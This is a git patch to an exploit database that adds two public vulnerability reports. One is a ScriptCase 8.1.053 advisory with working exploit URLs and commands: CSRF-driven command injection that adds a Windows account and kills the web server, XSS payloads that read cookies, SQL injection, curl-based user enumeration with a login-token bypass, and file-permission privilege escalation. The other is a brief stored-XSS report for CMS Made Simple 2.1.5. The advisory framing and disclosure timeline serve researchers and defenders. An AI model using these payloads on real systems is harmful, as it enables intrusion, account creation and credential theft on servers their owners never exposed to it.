From 4c5719d98f5bedda1a02331759b472bb2d8e0784 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Mon, 21 Nov 2016 05:01:19 +0000 Subject: [PATCH] DB: 2016-11-21 2 new exploits ScriptCase 8.1.053 - Multiple Vulnerabilities CMS Made Simple 2.1.5 - Cross-Site Scripting --- files.csv | 2 + platforms/php/webapps/40791.txt | 382 ++++++++++++++++++++++++++++++++ platforms/php/webapps/40792.txt | 21 ++ 3 files changed, 405 insertions(+) create mode 100755 platforms/php/webapps/40791.txt create mode 100755 platforms/php/webapps/40792.txt diff --git a/files.csv b/files.csv index 9ec3f38ed..c8dee1b1c 100755 --- a/files.csv +++ b/files.csv @@ -36791,3 +36791,5 @@ id,file,description,date,author,platform,type,port 40782,platforms/php/webapps/40782.txt,"Wordpress Plugin BBS e-Franchise 1.1.1 - SQL Injection",2016-11-12,"Lenon Leite",php,webapps,0 40783,platforms/php/webapps/40783.txt,"Wordpress Plugin Product Catalog 8 1.2.0 - SQL Injection",2016-11-12,"Lenon Leite",php,webapps,0 40776,platforms/php/webapps/40776.txt,"EditMe CMS - Cross-Site Request Forgery (Add New Admin)",2016-11-18,Vulnerability-Lab,php,webapps,0 +40791,platforms/php/webapps/40791.txt,"ScriptCase 8.1.053 - Multiple Vulnerabilities",2016-11-20,hyp3rlinx,php,webapps,0 +40792,platforms/php/webapps/40792.txt,"CMS Made Simple 2.1.5 - Cross-Site Scripting",2016-11-01,"liu zhu",php,webapps,0 diff --git a/platforms/php/webapps/40791.txt b/platforms/php/webapps/40791.txt new file mode 100755 index 000000000..d648f242a --- /dev/null +++ b/platforms/php/webapps/40791.txt @@ -0,0 +1,382 @@ +[+] Credits: hyp3rlinx + +[+] Website: hyp3rlinx.altervista.org + +[+] Source: http://hyp3rlinx.altervista.org/advisories/SCRIPTCASE-PHP-WEB-TOOL-MULTIPLE-VULNERABILITIES.txt + +[+] ISR: ApparitionSec + + + +Vendor: +================== +www.scriptcase.net + + + +Product: +=================== +ScriptCase +v8.1.053, v8.1.051, v8.1.43.0 + +scriptcase_install_en_us_v8.1.053.exe +hash: ceaba1fce05556b82ab37582a7c907f4 + +scriptcase_install_en_us_v8.1.051.exe +hash: c3c9fbe085ab5462304c0c73c8698946 + + +ScriptCase RAD is a development platform for PHP applications, is web +oriented and can be installed in a server in the internet. + + + +Vulnerability Type: +============================= +CSRF Remote Command Execution +CSRF Add Admin +SQL Injection +Cross Site Scripting +Local Privlege Escalation (Insecure File Permissions) +User Enumeration / Token Bypass + +Downloaded latest version v8.1.053, and still vulnerable. + + + +CVE Reference: +============== +N/A + + + +Vulnerability Details: +===================== + +[CSRF Remote Command Execution] +Scriptcase has a remote command execution ailment via CSRF, if an +authenticated user clicks an attacker link etc. This can allow attackers +to run arbitrary system commands on the affected host and do things like +add accounts etc. + +Scriptcase PHP code uses encryption / obfuscated so its not easy testing +but we can see here the error returned for PHP eval()'d code +when injecting an Array [] brackets or something as paremeter. + +Parse error: syntax error, unexpected end of file, expecting ']' in C:\Program Files (x86)\NetMake\v81\wwwroot\scriptcase\devel\lib\php\functions2.inc.php(358) : eval()'d code on line 1 + +After trying to wrap a Windows system call in backtick "`" operators it +worked perfectly. This allowed me to add an arbitrary system +account to the affected system. + + + +[CSRF] +There are several cross site request forgery vectors, allowing attackers to +add an Admin account to Scriptcase application etc. + + +[Cross Site Scripting] +Multiple XSS entry points exists within the vulnerable application both GET +and POST. + +Example XSS vulnerable scriptcase code 'ajax_cod_apls' is not santized +before being processed by ajax HTTP post request. + +$.ajax({ +type: 'POST', +url: '/scriptcase/devel/iface/generate.php', +data: +'compile_app_ajax=S&gen_option=console&targ_frame=_self&console=yes&ajax_cod_apls=' ++ str_open_apps, +success: function(s_result){ +a_result = s_result.split('__compile_ajax_sep_row__'); +nm_compile_gerar(); +} +}); + + + +[Local Privilege Escalation] +scriptcase uses weak insecure file permissions as the “Everyone” group has +full access on it. Allowing low privileged users to +execute arbitrary code in the security context of ANY other users with +elevated privileges on the affected system. + +"Everyone" encompasses all users who have logged in with a password as well +as built-in, non-password protected accounts such as Guest +and LOCAL_SERVICE.Any user (even guest) will be able to replace, modify or +change the file. This would allow an attacker the ability +to inject code or replace scriptcase used executables and have it run in +the context of the system. + + + +[User Enumeration] +On failed scriptcase login the application returns one of the following in +the HTTP response. + +"The login name provided is not registered on the system." +On a failed password but correct user name entered application HTTP +response returns. +"The password is incorrect." + + + + +Exploit code(s): +=============== + +[CSRF Remote Command Execution] + +Note: we NEED to use backtick operators "`" + +http://127.0.0.1:8081/scriptcase/devel/iface/popup_sql_script.php?sql_script=`start net user EVIL abc123 /add` + +Verify... + +c:\> net user + +User accounts for \\hyp3rlinx +------------------------------------------------------------------------ +Administrator hyp3rlinx Guest +EVIL Test Privileged-User + + +2) start Windows 'calc.exe' +http://127.0.0.1:8081/scriptcase/devel/iface/popup_sql_script.php?sql_script=`calc.exe` + +OR + +http://127.0.0.1:8081/scriptcase/devel/iface/popup_sql_script.php?sql_script=`start +calc.exe` + +**sometimes "calc.exe" doesnt appear but it is running use "tasklist /v | +findstr calc.exe" to verify it is in fact running. + + +4) Apache DOS (needs httpd environmental variable set) +http://127.0.0.1:8081/scriptcase/devel/iface/popup_sql_script.php?sql_script=`taskkill /f /im httpd.exe` + + + +[SQL Injection] + +AND boolean-based blind - WHERE or HAVING clause in 'nrLinhas' parameter "10 AND 2=2" + +
+ + + + + + + + + + + +
+ + + +[CSRF Add Admin] + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + +[CSRF mysql connect creation wizard] + +
+ + + + + + + + + + +
+ + + +[Cross Site Scripting] - Successful in Firefox + +XSS 1) + +http://127.0.0.1:8081/scriptcase/devel/iface/app_import.php?option=%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E + + +XSS 2) + +http://127.0.0.1:8081/scriptcase/devel/iface/popup_sql_script.php?sql_script=%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E + + +XSS 3) + +
+ + + + + + +
+ + +XSS 4) + +
+ + + + + + + + + + + +
+ + + +[Local Privilege Escalations] + +Proof. + +C:\Program Files (x86)\NetMake\v81\components>cacls * | findstr Everyone | +more +C:\Program Files (x86)\NetMake\v81\components\apache Everyone:(ID)F + +Everyone:(OI)(CI)(IO)(ID) +C:\Program Files (x86)\NetMake\v81\components\msodbcsql_x64.msi +Everyone:(ID)F +C:\Program Files (x86)\NetMake\v81\components\msodbcsql_x86.msi +Everyone:(ID)F +C:\Program Files (x86)\NetMake\v81\components\php Everyone:(ID)F +Everyone:(OI)(CI)(IO)(ID)F + + +C:\Program Files (x86)\NetMake\v81\wwwroot>cacls * | findstr Everyone | more +C:\Program Files (x86)\NetMake\v81\wwwroot\favicon.ico Everyone:(ID)F +C:\Program Files (x86)\NetMake\v81\wwwroot\index.php Everyone:(ID)F +C:\Program Files (x86)\NetMake\v81\wwwroot\robots.txt Everyone:(ID)F +C:\Program Files (x86)\NetMake\v81\wwwroot\scriptcase Everyone:(ID)F + +Everyone:(OI)(CI)(IO)(ID)F + + + +[User Account Enumeration / Token Bypass] + +First off the stupid token used on the login FORM e.g. "form_login=" +is totally useless you can put anything you like in it +and the application will happily process the request. + + +CURL Enumeration 1) +curl -i -v -X POST +http://127.0.0.1:8081/scriptcase/devel/iface/login.php?rand= -d +field_user=BOZO -d field_pass=1 -d ajax=nm -d option=login -d +form_login=STUPID-TOKEN -d language=en_US + +HTTP Response: +"error1:The login name provided is not registered on the system." + +CURL Enumeration 2) +curl -i -v -X POST +http://127.0.0.1:8081/scriptcase/devel/iface/login.php?rand= -d +field_user=admin -d field_pass=1 -d ajax=nm -d option=login -d +form_login=STUPID-TOKEN -d language=en_US + +HTTP Response: +"error1:The password is incorrect." + +Either way we know when we hit a valid account. + + + +Disclosure Timeline: +========================================= +Vendor Notification: October 13, 2016 +Vendor acknowledgement: October 14, 2016 +Vendor request POC video: October 14, 2016 +Sent vendor video link: October 14, 2016 +Request update from vendor: October 17, 2016 +Vendor reply: "under review" +Vendor requests video again: October 25, 2016 +Request update from vendor: October 30, 2016 +Vendor reply: "No information" +Request ETA: November 7, 2016 +Request status: November 14, 2016 +Vendor Unresponsive No More Replies +November 20, 2016 : Public Disclosure + + + +Exploitation Technique: +======================= +Remote / Local + + + +Severity Level: +================ +High + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, +provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in +vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the +information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author +prohibits any malicious use of security related information +or exploits by the author or elsewhere. \ No newline at end of file diff --git a/platforms/php/webapps/40792.txt b/platforms/php/webapps/40792.txt new file mode 100755 index 000000000..743230257 --- /dev/null +++ b/platforms/php/webapps/40792.txt @@ -0,0 +1,21 @@ + Exploit Title: CMS made simple Persistent XSS vulnerability +Date:2016-11-01 +Exploit Author: liu zhu +Vendor Homepage:http://www.cmsmadesimple.org/ +Software Link:http://101.110.118.22/s3.amazonaws.com/cmsms/downloads/13469/cmsms-2.1.5-install.zip +Version:2.1.5 +Tested on:chrome/firefox + +details: +Adminlog.php is used to record the operation log of the administrator and the +website editor. It does not filter the XSS script. So The website editors(lower +Privilege user) can attack the administrator, such as XSS phishing,CSRF. + +The steps to reproduce are below: +1. The website editor logs in and click "Content->news". input any XSS script(such as "") in title and submit. + +2. Then the administrator log in and click "site admin- admin log" , the XSS script will be triggered. + +Affact: +The vulnerability can be used to XSS Phishing or Cookie stolen attack +